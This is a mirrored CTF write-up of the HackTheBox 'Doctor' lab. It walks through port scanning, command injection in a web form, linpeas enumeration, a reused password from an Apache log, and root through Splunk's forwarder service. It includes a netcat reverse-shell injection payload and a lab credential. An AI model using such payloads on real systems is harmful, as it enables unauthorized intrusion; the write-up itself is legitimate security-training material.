mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-14 00:07:14 +00:00
100 lines
3 KiB
Markdown
100 lines
3 KiB
Markdown
|
# HackTheBox-Doctor
|
||
|
|
||
|
## NMAP
|
||
|
|
||
|
```
|
||
|
Nmap scan report for 10.10.10.209
|
||
|
Host is up (0.21s latency).
|
||
|
Not shown: 997 filtered ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|
||
|
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|
||
|
|_http-server-header: Apache/2.4.41 (Ubuntu)
|
||
|
|_http-title: Doctor
|
||
|
8089/tcp open ssl/http Splunkd httpd
|
||
|
| http-robots.txt: 1 disallowed entry
|
||
|
|_/
|
||
|
|_http-server-header: Splunkd
|
||
|
|_http-title: splunkd
|
||
|
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
|
||
|
| Not valid before: 2020-09-06T15:57:27
|
||
|
|_Not valid after: 2023-09-06T15:57:27
|
||
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||
|
```
|
||
|
|
||
|
## PORT 80
|
||
|
|
||
|
<img src="https://imgur.com/byFNRNC.png"/>
|
||
|
|
||
|
Looking at source code we see a domain name `doctors.htb`
|
||
|
|
||
|
<img src="https://imgur.com/XBNWOzc.png"/>
|
||
|
|
||
|
So let's try to add this on to our `/etc/hosts`
|
||
|
|
||
|
<img src="https://imgur.com/S0jQu4X.png"/>
|
||
|
|
||
|
## doctors.htb
|
||
|
|
||
|
<img src="https://imgur.com/fgUDmyL.png"/>
|
||
|
|
||
|
We can register and login with an account but it's not really useful
|
||
|
|
||
|
## PORT 8089
|
||
|
|
||
|
<img src="https://imgur.com/S4Iafvg.png"/>
|
||
|
|
||
|
I tried searching for default credentials for `splunkd` beacause for navigating to `servicesNS` credentials are required so I tried `admin:admin` and `admin:changeme` but didn't worked
|
||
|
|
||
|
Then I found this repository on GitHub
|
||
|
|
||
|
<img src="https://imgur.com/lt10mJd.png"/>
|
||
|
|
||
|
We are going to use `PySplunkWhisperer2_remote` because it's not being hosted on our machine
|
||
|
|
||
|
But this would not work becasue we need the credentials so I head over back to `doctors.htb` logged in as a new user at this point I didn't do it myself I had a little help from discord server
|
||
|
|
||
|
`<img src=http://IP/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'IP'$IFS'PORT')>`
|
||
|
|
||
|
<img src="https://imgur.com/wlMMBqk.png"/>
|
||
|
|
||
|
I didn't find anything on the box through manual enumeration so going to go with `linpeas`
|
||
|
|
||
|
<img src="https://imgur.com/MbdWgLO.png"/>
|
||
|
|
||
|
<img src="https://imgur.com/X6uDeig.png"/>
|
||
|
|
||
|
This was the only interesting thing that `linpeas` found
|
||
|
|
||
|
Reading `/var/log/apache2/backup`
|
||
|
|
||
|
<img src="https://imgur.com/ctoci6w.png"/>
|
||
|
|
||
|
`email=Guitar123`
|
||
|
|
||
|
Now I tried this at `doctors.htb/login` to reset the password but there was no email registered with this
|
||
|
|
||
|
By ruuning linpeas and found that there is a user named `shaun` so I guessed maybe this would be his password and I logged in with `shaun`
|
||
|
|
||
|
<img src=https://imgur.com/EKTuTGh.png/>
|
||
|
|
||
|
<img src="https://imgur.com/DiJJlpW.png"/>
|
||
|
|
||
|
Then I again ran `linpeas`
|
||
|
|
||
|
<img src="https://imgur.com/UqNF3JG.png"/>
|
||
|
|
||
|
And found some credentials in form of `bcrypt` hash
|
||
|
|
||
|
`$2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S`
|
||
|
|
||
|
But I could not crack this so I then returned to that exploit that we found and ran `python3 PySplunkWhisperer2_remote.py`
|
||
|
|
||
|
<img src="https://imgur.com/X8OTA3p.png"/>
|
||
|
|
||
|
So this means that we are authenticated and now only need to include the payload
|
||
|
|
||
|
|
||
|
<img src="https://imgur.com/TkGzdYr.png"/>
|
||
|
|
||
|
And we are done , this wasn't really an "Easy" machine . Coming from TryHackMe , HackTheBox is way more diffcult
|